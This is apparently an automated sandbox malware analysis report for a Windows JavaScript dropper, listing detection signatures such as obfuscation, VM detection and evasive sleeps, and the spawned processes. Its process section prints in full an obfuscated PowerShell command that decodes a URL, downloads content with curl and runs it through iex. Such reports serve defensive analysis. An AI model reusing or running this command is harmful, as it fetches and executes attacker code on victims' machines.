Windows
Analysis Report
js (2).js
Overview
General Information
Detection
Score: | 72 |
Range: | 0 - 100 |
Confidence: | 100% |
Signatures
Multi AV Scanner detection for submitted file
Creates processes via WMI
Joe Sandbox ML detected suspicious sample
Obfuscated command line found
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
wscript.exe (PID: 7896 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\js (2 ).js" MD5: A47CBE969EA935BDD3AB568BB126BC80) conhost.exe (PID: 7972 cmdline:
conhost -- headless p owershell $xmtwzilk= 'ur' ;set- alias prot ons c$($xm twzilk)l;$ fovrdle=(6 812,6860,6 863,6876,6 879,6871,6 863,6876,6 860,6808,6 877,6866,6 873,6874,6 809,6811,6 808,6874,6 866,6874,6 825,6877,6 823,6864,6 870,6867,6 860,6859,6 860,6861,6 812,6812); $lukhvjgc= ('ertigos' ,'get-cmdl et');$arcz ugy=$fovrd le;foreach ($aolnsemb z in $arcz ugy){$pdjo ywbzaf=$ao lnsembz;$b cwuyipnds= $bcwuyipnd s+[char]($ pdjoywbzaf -6762);$xr ulwmcyqbk= $bcwuyipnd s; $gjicsr etdvanx=$x rulwmcyqbk };$movkfdq x[2]=$gjic sretdvanx; $uilwjshkc qx='rl';$x zsofvgu=1; .$([char]( ((200 + 30 ) - (100 + 25)))+'e' +'x')(prot ons -useb $gjicsretd vanx) MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 7992 cmdline:
powershell $xmtwzilk ='ur' ;set -alias pro tons c$($x mtwzilk)l; $fovrdle=( 6812,6860, 6863,6876, 6879,6871, 6863,6876, 6860,6808, 6877,6866, 6873,6874, 6809,6811, 6808,6874, 6866,6874, 6825,6877, 6823,6864, 6870,6867, 6860,6859, 6860,6861, 6812,6812) ;$lukhvjgc =('ertigos ','get-cmd let');$arc zugy=$fovr dle;foreac h($aolnsem bz in $arc zugy){$pdj oywbzaf=$a olnsembz;$ bcwuyipnds =$bcwuyipn ds+[char]( $pdjoywbza f-6762);$x rulwmcyqbk =$bcwuyipn ds; $gjics retdvanx=$ xrulwmcyqb k};$movkfd qx[2]=$gji csretdvanx ;$uilwjshk cqx='rl';$ xzsofvgu=1 ;.$([char] (((200 + 3 0) - (100 + 25)))+'e '+'x')(pro tons -useb $gjicsret dvanx) MD5: 04029E121A0CFA5991749937DD22A1D9)
- cleanup
⊘No configs have been found
⊘No yara matches
System Summary |
---|
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |